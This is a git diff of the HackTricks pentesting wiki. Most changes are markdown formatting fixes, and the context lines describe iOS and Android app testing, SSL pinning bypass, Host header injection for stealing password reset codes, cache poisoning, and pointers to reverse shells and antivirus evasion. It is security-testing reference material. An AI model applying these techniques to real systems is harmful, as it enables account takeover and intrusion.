a/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md +++ b/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md @@ -1,6 +1,6 @@ # Spoofing your location in Play Store -**Information copied from** [**https://manifestsecurity.com/android-application-security-part-23/**](https://manifestsecurity.com/android-application-security-part-23/)**** +**Information copied from** [**https://manifestsecurity.com/android-application-security-part-23/**](https://manifestsecurity.com/android-application-security-part-23/) Many a times you have seen that application which you want to assess is only allowed in selected countries, so in that case you won’t be able to install that application on you android device. But if you can spoof your location to that country in which the application is allowed then you can get access to that application. Below is the procedure of the same. diff --git a/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md b/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md index 7d8c96cd..cf1c998b 100644 --- a/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md +++ b/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md @@ -123,7 +123,7 @@ In that scenario, you won't be able to abuse Reflection to execute arbitrary cod ### Remote Debugging **Renote WebView** **debugging** allow to access the webview with the **Chrome Developer Tools.**\ -****The **device** needs to be **accessible** by the PC (via USB, local emulator, local network...) and running the debuggable WebView, then access **chrome://inspect/#devices**: +The **device** needs to be **accessible** by the PC (via USB, local emulator, local network...) and running the debuggable WebView, then access **chrome://inspect/#devices**: ![](<../../.gitbook/assets/image (525).png>) diff --git a/mobile-apps-pentesting/android-checklist.md b/mobile-apps-pentesting/android-checklist.md index fe84780a..c085bdef 100644 --- a/mobile-apps-pentesting/android-checklist.md +++ b/mobile-apps-pentesting/android-checklist.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/mobile-apps-pentesting/ios-pentesting-checklist.md b/mobile-apps-pentesting/ios-pentesting-checklist.md index ec105dc3..9b04ded5 100644 --- a/mobile-apps-pentesting/ios-pentesting-checklist.md +++ b/mobile-apps-pentesting/ios-pentesting-checklist.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/mobile-apps-pentesting/ios-pentesting/README.md b/mobile-apps-pentesting/ios-pentesting/README.md index ba3728ca..ef493efe 100644 --- a/mobile-apps-pentesting/ios-pentesting/README.md +++ b/mobile-apps-pentesting/ios-pentesting/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -523,8 +523,8 @@ Check for possible couchbase databases in `/private/var/mobile/Containers/Data/A iOS store the cookies of the apps in the **`Library/Cookies/cookies.binarycookies`** inside each apps folder. However, developers sometimes decide to save them in the **keychain** as the mentioned **cookie file can be accessed in backups**. -To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) **\*\*or use** objection's **`ios cookies get`.**\ -**You can also use objection to** convert these files to a JSON\*\* format and inspect the data. +To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) or use** objection's **`ios cookies get`.**\ +**You can also use objection to** convert these files to a JSON** format and inspect the data. ```bash ...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json @@ -614,7 +614,7 @@ You can also use `ios keychain dump` from [**Objection**](https://github.com/sen #### **NSURLCredential** **NSURLCredential** is the perfect class to **store username and password in the keychain**. No need to bother with NSUserDefaults nor any keychain wrapper.\ -**\*\*Once the user is logged in, you can** store\*\* his username and password to the keychain: +Once the user is logged in, you can** store** his username and password to the keychain: ```swift NSURLCredential *credential; @@ -849,7 +849,7 @@ For **more information** about iOS cryptographic APIs and libraries access [http The tester should be aware that **local authentication should always be enforced at a remote endpoint** or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process. -The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) \_\*\*\_provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible (and recommended) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication. +The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) \_**\_provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible (and recommended) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication. The **fingerprint ID** sensor is operated by the [SecureEnclave security coprocessor](https://www.blackhat.com/docs/us-16/materials/us-16-Mandt-Demystifying-The-Secure-Enclave-Processor.pdf) and does not expose fingerprint data to any other parts of the system. Next to Touch ID, Apple introduced _Face ID_: which allows authentication based on facial recognition. @@ -1093,7 +1093,7 @@ In order to check this issue using Burp, after trusting Burp CA in the iPhone, y ### Certificate Pinning If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\ -In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) \*\*\*\*or install \[\*\*Burp Mobile Assistant\_\*]\(\_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)\*\*\* +In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) or install \[**Burp Mobile Assistant\_\*]\(\_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)**\* You can also use **objection's** `ios sslpinning disable` diff --git a/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md b/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md index c18f593b..2d1fe9a4 100644 --- a/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md +++ b/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md @@ -61,7 +61,7 @@ When accessing your iOS device via SSH consider the following: > Remember to change the default password for both users `root` and `mobile` as anyone on the same network can find the IP address of your device and connect via the well-known default password, which will give them root access to your device. -**** + ### **Connect to a Device via SSH over USB** @@ -135,7 +135,7 @@ $ scp -P 2222 root@localhost:/tmp/data.tgz . ### Using iFunbox -****[**iFunbox**](https://www.i-funbox.com/en/page-download.html) is a GUI application that can be used for several things (uploading/downloading files among them).\ +[**iFunbox**](https://www.i-funbox.com/en/page-download.html) is a GUI application that can be used for several things (uploading/downloading files among them).\ Another GUI tool for this purpose is [**iExplorer**](https://macroplant.com/iexplorer). {% hint style="info" %} @@ -320,7 +320,7 @@ After this, the `Telegram.ipa` file will be created in your current directory. Y #### flexdecrypt In order to **obtain the ipa file** from an installed application you can also use the tool [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) or a wrapper of the tool called [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac)**.**\ -****In any case you will need to **install flexdecrypt in the device** running something like: +In any case you will need to **install flexdecrypt in the device** running something like: ```markup wget https://github.com/JohnCoates/flexdecrypt/releases/download/1.1/flexdecrypt.deb diff --git a/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md b/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md index b8301d86..b6e7a396 100644 --- a/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md +++ b/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md @@ -3,7 +3,7 @@ ## Burp Cert Installation in physical iOS You can install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing) **for help installing the Burp Certificate, configure the proxy and perform SSL Pinning.**\ -****Or you can manually follow the next steps: +Or you can manually follow the next steps: * Configure **Burp** as the iPhone **proxy in **_**Settings**_** --> **_**Wifi**_** --> **_**Click the network**_** --> **_**Proxy**_ * Access `http://burp` and download the certificate diff --git a/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md b/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md index 0a9730a5..52fa5aa0 100644 --- a/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md +++ b/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md @@ -1,6 +1,6 @@ # Extracting Entitlements From Compiled Application -**Page copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links)**** +**Page copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links) If you only have the app's IPA or simply the installed app on a jailbroken device, you normally won't be able to find `.entitlements` files. This could be also the case for the `embedded.mobileprovision` file. Still, you should be able to extract the entitlements property lists from the app binary yourself (which you've previously obtained as explained in the "iOS Basic Security Testing" chapter, section "Acquiring the App Binary"). diff --git a/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md b/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md index 9b6b20da..c0847eb7 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md @@ -1,6 +1,6 @@ # iOS App Extensions -**Content copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions)**** +**Content copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions) App extensions let apps offer custom functionality and content to users while they’re interacting with other apps or the system. Some notable ones are: diff --git a/mobile-apps-pentesting/ios-pentesting/ios-basics.md b/mobile-apps-pentesting/ios-pentesting/ios-basics.md index 6b4edf33..22ee2ede 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-basics.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-basics.md @@ -31,7 +31,7 @@ All class keys except `NSFileProtectionNone` are encrypted with a key derived fr Since iOS 7, the default data protection class is "Protected Until First User Authentication". -****[**FileDP**](https://github.com/abjurato/FileDp-Source) is a program that you can upload and use inside the IPhone to **inspect the data protection class** of each file. +[**FileDP**](https://github.com/abjurato/FileDp-Source) is a program that you can upload and use inside the IPhone to **inspect the data protection class** of each file. ### The Keychain diff --git a/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md b/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md index 230e9842..ceb21ff1 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md @@ -118,7 +118,7 @@ $ rabin2 -zzq Telegram\ X.app/Telegram\ X | grep -i "openurl" * [**IDB**](https://github.com/facebook/idb): * Start IDB, connect to your device and select the target app. You can find details in the [IDB documentation](https://www.idbtool.com/documentation/setup.html). * Go to the **URL Handlers** section. In **URL schemes**, click **Refresh**, and on the left you'll find a list of all custom schemes defined in the app being tested. You can load these schemes by clicking **Open**, on the right side. By simply opening a blank URI scheme (e.g., opening `myURLscheme://`), you can discover hidden functionality (e.g., a debug window) and bypass local authentication. -* **Frida**: +* **Frida**: If you simply want to open the URL scheme you can do it using Frida: diff --git a/mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md b/mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md index 04dcbbcf..3eedf3d5 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md @@ -81,7 +81,7 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone libobjc.A.dylib 0x1bdc64000 233472 (228.0 KiB) /usr/lib/libobjc.A.dylib [...] ``` -* `memory list exports `: Exports of a loaded module +* `memory list exports `: Exports of a loaded module ```bash memory list exports iGoat-Swift @@ -176,7 +176,7 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone [iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:] ``` -## Basic Hooking +## Basic Hooking Now that you have **enumerated the classes and modules** used by the application you may have found some **interesting class and method names**. diff --git a/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md b/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md index 0e78d0fd..26e0a607 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md @@ -99,11 +99,11 @@ Different iOS versions require **different jailbreaking techniques**. [Determine The iOS jailbreak scene evolves so rapidly that providing up-to-date instructions is difficult. However, we can point you to some sources that are currently reliable. -* ****[**Can I Jailbreak?**](https://canijailbreak.com)**** -* ****[**The iPhone Wiki**](https://www.theiphonewiki.com)**** -* ****[**Redmond Pie**](https://www.redmondpie.com)**** -* ****[**Reddit Jailbreak**](https://www.reddit.com/r/jailbreak/)**** -* [**https://checkra.in/**](https://checkra.in)**** +* [**Can I Jailbreak?**](https://canijailbreak.com) +* [**The iPhone Wiki**](https://www.theiphonewiki.com) +* [**Redmond Pie**](https://www.redmondpie.com) +* [**Reddit Jailbreak**](https://www.reddit.com/r/jailbreak/) +* [**https://checkra.in/**](https://checkra.in) > Note that any modification you make to your device is at your own risk. While jailbreaking is typically safe, things can go wrong and you may end up bricking your device. No other party except yourself can be held accountable for any damage. diff --git a/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md b/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md index 735af72e..d6332da8 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md @@ -8,7 +8,7 @@ The [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboar Some security considerations: * Users **cannot grant or deny permission** for apps to read the **pasteboard**. -* Since iOS 9, apps [cannot access the pasteboard while in background](https://forums.developer.apple.com/thread/13760), this mitigates background pasteboard monitoring. +* Since iOS 9, apps [cannot access the pasteboard while in background](https://forums.developer.apple.com/thread/13760), this mitigates background pasteboard monitoring. * [Apple warns about persistent named pasteboards](https://developer.apple.com/documentation/uikit/uipasteboard?language=objc) and **discourages their use**. Instead, shared containers should be used. * Starting in iOS 10 there is a new Handoff feature called **Universal Clipboard** that is enabled by default. It allows the **general pasteboard contents to automatically transfer between devices**. This feature can be disabled if the developer chooses to do so and it is also possible to set an expiration time and date for copied data. diff --git a/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md b/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md index d3f81070..950053df 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md @@ -33,7 +33,7 @@ If you only has the compiled application you can extract the entitlements follow Try to retrieve the `apple-app-site-association` file from the server using the associated domains you got from the previous step. This file needs to be accessible via HTTPS, without any redirects, at `https:///apple-app-site-association` or `https:///.well-known/apple-app-site-association`. -You can retrieve it yourself with your browser or use the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/). +You can retrieve it yourself with your browser or use the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/). ### **Checking the Link Receiver Method** diff --git a/mobile-apps-pentesting/ios-pentesting/ios-webviews.md b/mobile-apps-pentesting/ios-pentesting/ios-webviews.md index 36619c03..106eb2e2 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-webviews.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-webviews.md @@ -4,13 +4,13 @@ WebViews are in-app browser components for displaying interactive **web** **content**. They can be used to embed web content directly into an app's user interface. iOS WebViews **support** **JavaScript** execution **by default**, so script injection and Cross-Site Scripting attacks can affect them. -* ****[**UIWebView**](https://developer.apple.com/documentation/uikit/uiwebview)**:** UIWebView is deprecated starting on iOS 12 and should not be used. It shouldn't be used. **JavaScript cannot be disabled**. -* ****[**WKWebView**](https://developer.apple.com/documentation/webkit/wkwebview): This is the appropriate choice for extending app functionality, controlling displayed content. +* [**UIWebView**](https://developer.apple.com/documentation/uikit/uiwebview)**:** UIWebView is deprecated starting on iOS 12 and should not be used. It shouldn't be used. **JavaScript cannot be disabled**. +* [**WKWebView**](https://developer.apple.com/documentation/webkit/wkwebview): This is the appropriate choice for extending app functionality, controlling displayed content. * **JavaScript** is enabled by default but thanks to the **`javaScriptEnabled`** property of `WKWebView`, it **can be completely disabled**, preventing all script injection flaws. * The **`JavaScriptCanOpenWindowsAutomatically`** can be used to **prevent** JavaScript from **opening new windows**, such as pop-ups. * The **`hasOnlySecureContent`** property can be used to verify resources loaded by the WebView are retrieved through encrypted connections. * `WKWebView` implements out-of-process rendering, so **memory corruption bugs won't affect** the main app process. -* ****[**SFSafariViewController**](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller)**:** It should be used to provide a **generalized web viewing experience**. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements: +* [**SFSafariViewController**](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller)**:** It should be used to provide a **generalized web viewing experience**. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements: * A read-only address field with a security indicator. * An Action ("**Share**") **button**. @@ -160,7 +160,7 @@ WebViews can load remote content from an endpoint, but they can also load local * **UIWebView**: It can use deprecated methods [`loadHTMLString:baseURL:`](https://developer.apple.com/documentation/uikit/uiwebview/1617979-loadhtmlstring?language=objc) or [`loadData:MIMEType:textEncodingName:baseURL:`](https://developer.apple.com/documentation/uikit/uiwebview/1617941-loaddata?language=objc)to load content. * **WKWebView**: It can use the methods [`loadHTMLString:baseURL:`](https://developer.apple.com/documentation/webkit/wkwebview/1415004-loadhtmlstring?language=objc) or [`loadData:MIMEType:textEncodingName:baseURL:`](https://developer.apple.com/documentation/webkit/wkwebview/1415011-loaddata?language=objc) to load local HTML files and `loadRequest:` for web content. Typically, the local files are loaded in combination with methods including, among others: [`pathForResource:ofType:`](https://developer.apple.com/documentation/foundation/nsbundle/1410989-pathforresource), [`URLForResource:withExtension:`](https://developer.apple.com/documentation/foundation/nsbundle/1411540-urlforresource?language=objc) or [`init(contentsOf:encoding:)`](https://developer.apple.com/documentation/swift/string/3126736-init). In addition, you should also verify if the app is using the method [`loadFileURL:allowingReadAccessToURL:`](https://developer.apple.com/documentation/webkit/wkwebview/1414973-loadfileurl?language=objc). Its first parameter is `URL` and contains the URL to be loaded in the WebView, its second parameter `allowingReadAccessToURL` may contain a single file or a directory. If containing a single file, that file will be available to the WebView. However, if it contains a directory, all files on that **directory will be made available to the WebView**. Therefore, it is worth inspecting this and in case it is a directory, verifying that no sensitive data can be found inside it. -If you have the source code you can search for those methods. Having the **compiled** **binary** you can also search for these methods: +If you have the source code you can search for those methods. Having the **compiled** **binary** you can also search for these methods: ```bash $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString" @@ -169,7 +169,7 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString" ### File Access -* **UIWebView:** +* **UIWebView:** * The `file://` scheme is always enabled. * File access from `file://` URLs is always enabled. * Universal access from `file://` URLs is always enabled. diff --git a/other-web-tricks.md b/other-web-tricks.md index c754a898..32c71573 100644 --- a/other-web-tricks.md +++ b/other-web-tricks.md @@ -2,7 +2,7 @@ ### Host header -Several times the back-end trust the H**ost header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). +Several times the back-end trust the H**ost header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). ### Session booleans diff --git a/pentesting-methodology.md b/pentesting-methodology.md index f4101b2c..5df80eb5 100644 --- a/pentesting-methodology.md +++ b/pentesting-methodology.md @@ -15,7 +15,7 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtai LinPEAS, WinPEAS and MacPEAS aren’t enough for you? **Welcome The PEASS Family**, a limited collection of exclusive **NFTs** of our favourite PEASS in disguise, designed by my team. **Go get your favourite and make it yours!** And if you are a PEASS & Hacktricks enthusiast, you can get your hands now on our [**custom swag**](https://peass.creator-spring.com) **and show how much you like our projects!** -You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ +You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. {% endhint %} @@ -71,7 +71,7 @@ If at this point you haven't found any interesting vulnerability you **may need Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/). -Specially in Windows you could need some help to **avoid antiviruses**: **\*\*\[Check this page]\(windows/av-bypass.md)**.\*\* +Specially in Windows you could need some help to **avoid antiviruses**: \[Check this page]\(windows/av-bypass.md)**.** ## 8- Inside diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md index 91893b8b..85e14dcd 100644 --- a/pentesting-web/cache-deception.md +++ b/pentesting-web/cache-deception.md @@ -12,11 +12,11 @@ The goal of poisoning the cache is to make the **clients load unexpected resources partially or totally controlled by the attacker**.\ The poisoned response will only be served to users who visit the affected page while the cache is poisoned. As a result, the impact can range from non-existent to massive depending on whether the page is popular or not. -In order to perform a cache poisoning attack you need first to **identify ukeyed inputs** (parameters not needed to appear on the the cached request but that change the returned page), see **how to abuse** this parameter and **get the response cached**. +In order to perform a cache poisoning attack you need first to **identify ukeyed inputs** (parameters not needed to appear on the the cached request but that change the returned page), see **how to abuse** this parameter and **get the response cached**. ### Identify and evaluate unkeyed inputs -You could use [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load script from there: +You could use [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load script from there: ```markup @@ -34,7 +34,7 @@ The header **`Cache-Control`** is also interesting to know if a resource is bein Another interesting header is **`Vary`** . This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.\ One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache. -When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working. +When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working. ## Examples diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md index fa0bd2e2..724708c8 100644 --- a/pentesting-web/clickjacking.md +++ b/pentesting-web/clickjacking.md @@ -154,5 +154,5 @@ See the following documentation for further details and more complex examples: ## References -* ****[**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)**** -* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html)**** +* [**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking) +* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html) diff --git a/pentesting-web/client-side-template-injection-csti.md 